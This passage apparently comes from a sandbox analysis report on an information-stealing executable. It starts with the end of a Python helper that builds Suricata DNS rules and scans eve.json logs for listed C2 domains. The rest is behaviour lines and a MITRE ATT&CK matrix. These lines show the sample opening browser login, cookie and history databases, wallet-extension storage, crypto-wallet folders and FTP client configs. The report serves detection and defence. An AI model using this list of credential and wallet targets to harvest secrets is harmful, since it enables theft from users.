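            hits.append((ev["timestamp"], ev["src_ip"], dns["rrname"], matched))
    return hits


# Constructed eve.json DNS events (not from the sandbox run): one benign
# query, one exact C2 hit and its answer, one subdomain hit, one near-miss.
SAMPLE_EVE = """
{"timestamp":"2024-12-18T10:00:01.000000+0000","event_type":"dns","src_ip":"10.0.0.15","dest_ip":"10.0.0.1","dns":{"type":"query","rrname":"www.example.com","rrtype":"A"}}
{"timestamp":"2024-12-18T10:00:02.000000+0000","event_type":"dns","src_ip":"10.0.0.15","dest_ip":"10.0.0.1","dns":{"type":"query","rrname":"rapeflowwj.lat","rrtype":"A"}}
{"timestamp":"2024-12-18T10:00:02.500000+0000","event_type":"dns","src_ip":"10.0.0.15","dest_ip":"10.0.0.1","dns":{"type":"answer","rrname":"rapeflowwj.lat","rrtype":"A","rdata":"203.0.113.7"}}
{"timestamp":"2024-12-18T10:00:03.000000+0000","event_type":"dns","src_ip":"10.0.0.22","dest_ip":"10.0.0.1","dns":{"type":"query","rrname":"cdn.sweepyribs.lat","rrtype":"A"}}
{"timestamp":"2024-12-18T10:00:04.000000+0000","event_type":"dns","src_ip":"10.0.0.22","dest_ip":"10.0.0.1","dns":{"type":"query","rrname":"notsweepyribs.lat","rrtype":"A"}}
"""

if __name__ == "__main__":
    for rule in suricata_dns_rules(C2_DOMAINS):
        print(rule)
    for hit in scan_eve_dns(SAMPLE_EVE.splitlines()):
        print("HIT", *hit)
```

The match is deliberately a label-boundary suffix test rather than a substring test: a stealer's operators rotate hosts under the same registered domains, so subdomains must hit, but a plain substring check would also fire on unrelated names that merely end in the same letters. Only query events are inspected; the answer event for the same name is ignored so one lookup produces one hit.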

                Stealing of Sensitive Information

                Source: Yara match, file source: Process Memory Space: pPizCGDvrx.exe PID: 7392, type: MEMORYSTR
                Source: Yara match, file source: sslproxydump.pcap, type: PCAP
                Source: Yara match, file source: decrypted.memstr, type: MEMORYSTR
                Source: pPizCGDvrx.exe String found in binary or memory: Wallets/Electrum
                Source: pPizCGDvrx.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: pPizCGDvrx.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: pPizCGDvrx.exe String found in binary or memory: window-state.json
                Source: pPizCGDvrx.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (2 occurrences)
                Source: pPizCGDvrx.exe String found in binary or memory: Wallets/Ethereum
                Source: pPizCGDvrx.exe String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: pPizCGDvrx.exe String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (2 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (2 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents (8 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO (10 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents\GNLQNHOLWB (2 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV (12 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE (10 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG (10 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP (2 occurrences)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: number of queries: 1001
                Source: Yara match | File source: 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: pPizCGDvrx.exe PID: 7392, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: pPizCGDvrx.exe PID: 7392, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the signature count shown beside that technique in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
